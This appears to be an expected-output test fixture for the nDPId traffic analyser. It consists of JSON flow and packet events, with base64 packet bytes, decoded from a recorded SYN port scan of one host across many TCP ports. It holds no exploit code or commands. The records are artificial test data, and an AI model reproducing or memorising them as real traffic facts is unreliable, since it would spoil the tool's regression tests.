+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs1H4AADMGQPSsEAAIQA2GNIzSIrjdUoMYAAAAAGACEAAF1wAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057678,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"synscan.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057678,"pkt":"ACYLMQczACWzv5HuCABFAAAs0TgAACYGUTqsEAAIQA2GNIzSAiTdUoMYAAAAAGACDAAqawAAAgQFtA=="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1278275057740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275057740,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAAWjNIpZyOl3VKDGWASFtDU2wAAAgQFZAAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1278275057740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275057740,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACAAZjNIefGtp3VKDGVAUAADGOQAAAAAAAAAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAseeEAACgGppGsEAAIQA2GNIzSBCDdUoMYAAAAAGACBAAwbwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsRVMAACsG2B+sEAAIQA2GNIzSKYXdUoMYAAAAAGACEAD\/CQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsRm4AADAG0gSsEAAIQA2GNIzSCi3dUoMYAAAAAGACBAAqYgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAsnToAADAGezisEAAIQA2GNIzSKX3dUoMYAAAAAGACBAALEgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAskEcAADcGgSusEAAIQA2GNIzSA97dUoMYAAAAAGACEAAksQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057742,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057742,"pkt":"ACYLMQczACWzv5HuCABFAAAs0R4AADcGQFSsEAAIQA2GNIzSFSbdUoMYAAAAAGACEAATaQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"synscan.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsbqYAACwGrcysEAAIQA2GNIzSCK7dUoMYAAAAAGACBAAr4QAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsJyoAADQG7UisEAAIQA2GNIzSF3DdUoMYAAAAAGACBAAdHwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsfqQAACwGnc6sEAAIQA2GNIzSBpfdUoMYAAAAAGACBAAt+AAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1233,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"synscan.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAskxYAACsGilysEAAIQA2GNIzSBNHdUoMYAAAAAGACEAAjvgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"synscan.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsCEIAADAGEDGsEAAIQA2GNIzSB+7dUoMYAAAAAGACBAAsoQAAAgQFtA=="} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"synscan.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAszJQAADoGQd6sEAAIQA2GNIzSAAbdUoMYAAAAAGACDAAsiQAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"synscan.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsqb4AACYGeLSsEAAIQA2GNIzSBYndUoMYAAAAAGACDAAnBgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsNw4AADUG3GSsEAAIQA2GNIzSIB7dUoMYAAAAAGACCAAQcQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"synscan.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsOZAAACUG6eKsEAAIQA2GNIzSAqvdUoMYAAAAAGACCAAt5AAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057743,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"synscan.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057743,"pkt":"ACYLMQczACWzv5HuCABFAAAsX3cAADcGsfusEAAIQA2GNIzSC+rdUoMYAAAAAGACEAAcpQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsRPgAADsGyHqsEAAIQA2GNIzTAiTdU4MZAAAAAGACEAAmaAAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsCYQAACgGFu+sEAAIQA2GNIzTIrjdU4MZAAAAAGACBAAR1AAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsS98AACoG0pOsEAAIQA2GNIzTAIfdU4MZAAAAAGACDAAsBQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsHuAAADcG8pKsEAAIQA2GNIzTAirdU4MZAAAAAGACEAAmYgAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":256,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"synscan.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsiYkAADgGhumsEAAIQA2GNIzTAQDdU4MZAAAAAGACBAAzjAAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057820,"pkt":"ACYLMQczACWzv5HuCABFAAAsvMkAADoGUamsEAAIQA2GNIzTAb3dU4MZAAAAAGACDAAqzwAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"synscan.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057820,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 